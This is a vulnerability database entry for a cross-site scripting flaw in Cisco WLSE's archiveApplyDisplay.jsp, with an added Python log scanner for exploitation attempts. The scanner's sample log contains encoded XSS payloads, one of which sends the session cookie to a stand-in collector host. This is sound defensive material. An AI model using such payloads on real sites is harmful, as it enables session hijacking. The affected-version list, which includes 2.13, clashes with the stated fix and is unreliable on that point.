CiscoWorks WLSE Web interface archiveApplyDisplay.jsp cross-site scripting
| cisco-wlse-user-xss (25883) |
Description:
CiscoWorks Wireless LAN Solution Engine (WLSE) appliances are vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the /wlse/configure/archive/archiveApplyDisplay.jsp script. A remote attacker could exploit this vulnerability by persuading a victim with an active session to follow a specially crafted link that supplies script in the 'displayMsg' parameter, which is then executed in the victim's Web browser within the security context of the Web user interface. This allows the attacker to steal the victim's cookie-based authentication credentials and gain administrative access to the Web interface.
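As a detection check for this issue, the following is an added example and is not part of the X-Force entry or of Cisco's software: it scans web server access log lines in Common Log Format for requests to archiveApplyDisplay.jsp whose displayMsg value, after URL-decoding (including double-encoded payloads), contains script or HTML markers. The log lines, the 192.0.2.1 collector address and the assumption that the appliance logs in Common Log Format are all constructed for illustration; a real WLSE log may use a different layout.

```python
"""Flag requests that look like exploitation attempts against the
archiveApplyDisplay.jsp displayMsg cross-site scripting issue.

Added example, not code from the X-Force entry or from Cisco. Assumes the
web server writes Common Log Format lines; the sample lines below are
constructed, not captured from a real appliance.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

VULN_PATH = "/wlse/configure/archive/archiveApplyDisplay.jsp"
VULN_PARAM = "displayMsg"

# Common Log Format: host ident user [time] "METHOD target HTTP/x" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

# Markers that indicate injected HTML/script rather than a plain status message.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|body|object|embed)\b"
    r"|javascript\s*:"
    r"|\bon[a-z]+\s*=",
    re.IGNORECASE,
)


def normalize(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%253C) are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_line(line: str) -> Optional[dict]:
    """Return a finding for a suspicious request to the vulnerable page, else None."""
    m = CLF_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.lower() != VULN_PATH.lower():
        return None
    # parse_qs already decodes one layer; keep_blank_values keeps "displayMsg=" visible
    values = parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM, [])
    for raw in values:
        decoded = normalize(raw)
        if XSS_MARKERS.search(decoded):
            return {
                "host": m.group("host"),
                "time": m.group("time"),
                "status": int(m.group("status")),
                "payload": decoded,
            }
    return None


def scan(lines):
    """Run check_line over an iterable of log lines and collect the findings."""
    return [f for f in (check_line(line) for line in lines) if f]


# Constructed sample log; 192.0.2.1 is a documentation address standing in for
# an attacker-controlled cookie collector.
SAMPLE_LOG = [
    # benign: a normal status message passed to the page
    '10.0.0.5 - - [19/Apr/2006:10:15:32 -0500] "GET /wlse/configure/archive/'
    'archiveApplyDisplay.jsp?displayMsg=Archive+applied HTTP/1.1" 200 1532',
    # URL-encoded script tag that sends the session cookie off-box
    '10.0.0.9 - - [19/Apr/2006:10:16:01 -0500] "GET /wlse/configure/archive/'
    'archiveApplyDisplay.jsp?displayMsg=%3Cscript%3Edocument.location%3D%27http'
    '%3A%2F%2F192.0.2.1%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 1601',
    # double-encoded event-handler variant, meant to slip past a naive filter
    '10.0.0.9 - - [19/Apr/2006:10:16:40 -0500] "GET /wlse/configure/archive/'
    'archiveApplyDisplay.jsp?displayMsg=%253Cimg%2520src%253Dx%2520onerror%253D'
    'alert(1)%253E HTTP/1.1" 200 1601',
    # same marker against a different page: outside this rule's scope
    '10.0.0.9 - - [19/Apr/2006:10:17:05 -0500] "GET /wlse/other.jsp?q=%3Cscript%3E'
    ' HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['time']} {finding['host']} -> {finding['payload']}")
```

The rule keys on the page path and parameter named in the advisory rather than on a generic `<script>` string, so it stays quiet on other pages while still catching encoded and double-encoded variants; a status of 200 on a flagged line indicates the appliance served the reflected payload rather than rejecting the request.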
Consequences:
Gain Access
Remedy:
Upgrade to the latest version of the WLSE software (2.13 or later), as listed in Cisco Security Advisory cisco-sa-20060419-wlse. See References.
References:
- Assurance.com.au - Vulnerability Advisory: Multiple vulnerabilities in Linux based Cisco products.
- BugTraq Mailing List, Wed Apr 19 2006 - 10:15:32 CDT: Multiple vulnerabilities in Linux based Cisco products.
- BugTraq Mailing List, Wed Apr 19 2006 - 10:42:50 CDT: Re: Multiple vulnerabilities in Linux based Cisco products.
- Cisco Security Response 2006 April 19 1500 UTC (GMT): Response to Privilege Escalation on Multiple Cisco Products.
- cisco-sa-20060419-wlse: Cisco Security Advisory: Multiple Vulnerabilities in the WLSE Appliance.
- BID-17604: Cisco Wireless Lan Solution Engine ArchiveApplyDisplay.JSP Cross-Site Scripting Vulnerability
- CVE-2006-1960: Cross-site scripting (XSS) vulnerability in the appliance web user interface in Cisco CiscoWorks Wireless LAN Solution Engine (WLSE) and WLSE Express before 2.13 allows remote attackers to inject arbitrary web script or HTML, possibly via the displayMsg parameter to archiveApplyDisplay.jsp, aka bug ID CSCsc01095.
- OSVDB ID: 24812: CiscoWorks WLSE archiveApplyDisplay.jsp displayMsg Variable XSS
- SA19736: Cisco WLSE Privilege Escalation and Cross-Site Scripting
- SECTRACK ID: 1015965: CiscoWorks Wireless LAN Solution Engine Cross-Site Scripting Flaw Yields Administrative Privileges and Command Line Bug Lets Remote Authenticated Users Gain Shell Access
- VUPEN/ADV-2006-1434: CiscoWorks Wireless LAN Solution Engine (WLSE) Multiple Vulnerabilities
Platforms Affected:
- Cisco Wireless LAN Solution Engine 2.0
- Cisco Wireless LAN Solution Engine 2.0 Express
- Cisco Wireless LAN Solution Engine 2.1
- Cisco Wireless LAN Solution Engine 2.1 Express
- Cisco Wireless LAN Solution Engine 2.10 Express
- Cisco Wireless LAN Solution Engine 2.10
- Cisco Wireless LAN Solution Engine 2.11 Express
- Cisco Wireless LAN Solution Engine 2.11
- Cisco Wireless LAN Solution Engine 2.12 Express
- Cisco Wireless LAN Solution Engine 2.12
- Cisco Wireless LAN Solution Engine 2.13
- Cisco Wireless LAN Solution Engine 2.13 Express
- Cisco Wireless LAN Solution Engine 2.2
- Cisco Wireless LAN Solution Engine 2.2 Express
- Cisco Wireless LAN Solution Engine 2.3
- Cisco Wireless LAN Solution Engine 2.3 Express
- Cisco Wireless LAN Solution Engine 2.4 Express
- Cisco Wireless LAN Solution Engine 2.4
- Cisco Wireless LAN Solution Engine 2.5
- Cisco Wireless LAN Solution Engine 2.5 Express
- Cisco Wireless LAN Solution Engine 2.6 Express
- Cisco Wireless LAN Solution Engine 2.6
- Cisco Wireless LAN Solution Engine 2.7
- Cisco Wireless LAN Solution Engine 2.7 Express
- Cisco Wireless LAN Solution Engine 2.8
- Cisco Wireless LAN Solution Engine 2.8 Express
- Cisco Wireless LAN Solution Engine 2.9 Express
- Cisco Wireless LAN Solution Engine 2.9
Reported:
Apr 19, 2006
The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
For corrections or additions please email xforce@iss.net
